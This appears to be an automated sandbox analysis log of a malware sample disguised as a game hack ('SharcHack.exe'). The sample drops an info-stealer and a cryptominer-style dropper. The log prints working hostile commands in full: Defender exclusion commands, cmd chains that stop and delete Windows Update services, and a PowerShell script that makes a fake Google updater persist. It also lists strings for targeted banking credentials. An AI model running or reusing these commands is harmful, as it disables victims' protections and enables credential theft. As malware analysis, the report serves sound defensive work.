                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmpJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extractJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vmware, inc.
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                                  Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: discord.comVMware20,11696428655f
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: global block list test formVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                  Source: SharcHack.exeBinary or memory string: ]YhGfswW}
                                  Source: v2.exe, 00000007.00000002.2161277920.0000000000FBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                  Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vmware7,1
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                                  Source: v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vmware
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                  Source: CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                  Source: tmpE21D.tmp.dat.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeAPI call chain: ExitProcess graph end nodegraph_5-13
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_02CCC1E8 LdrInitializeThunk,7_2_02CCC1E8
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD43E3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6BBD43E3
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBF8910 _memset,OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,_memset,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,_memset,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_memset,GetEnvironmentVariableW,OutputDebugStringA,_memset,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,_memset,GetEnvironmentVariableW,SetEnvironmentVariableW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_memset,__snprintf,OutputDebugStringA,7_2_6BBF8910
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBDF76D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_6BBDF76D
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeCode function: 5_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,PathFindFileNameA,5_2_00401AE1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF11180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,2_2_00007FF69AF11180
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69AF1BA59 SetUnhandledExceptionFilter,2_2_00007FF69AF1BA59
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69B29D2A4 SetUnhandledExceptionFilter,2_2_00007FF69B29D2A4
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD43E3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6BBD43E3
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD1186 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6BBD1186
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B605DB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6B605DB3
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B601060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_6B601060
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B601464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_6B601464
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Program Files\Google\Chrome\updater.exeNtQuerySystemInformation: Direct from: 0x7FF61907501E
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeNtQuerySystemInformation: Direct from: 0x7FF69AF1501EJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\sc.exe protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 360
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5828
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\conhost.exe base: 26E2118010
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\conhost.exe base: 8E06410010
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeProcess created: C:\Users\user\AppData\Local\Temp\v2.exe "C:\Users\user\AppData\Local\Temp\v2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tugby#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /fJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tugby#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "googleupdatetaskmachineqc" } else { "c:\program files\google\chrome\updater.exe" }Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zfjwxc#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }

                                  Language, Device and Operating System Detection

                                  barindex
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B601587 cpuid 8_2_6B601587
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,8_2_6B623ADF
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: EnumSystemLocalesW,8_2_6B619A82
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: EnumSystemLocalesW,8_2_6B623801
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_6B62388C
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,8_2_6B619FEE
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,8_2_6B623D0E
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_6B623DE4
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,8_2_6B4D8C5F
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_6B623C08
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: EnumSystemLocalesW,8_2_6B623766
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: EnumSystemLocalesW,8_2_6B62371B
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetLocaleInfoW,8_2_6B623674
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_6B62346F
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
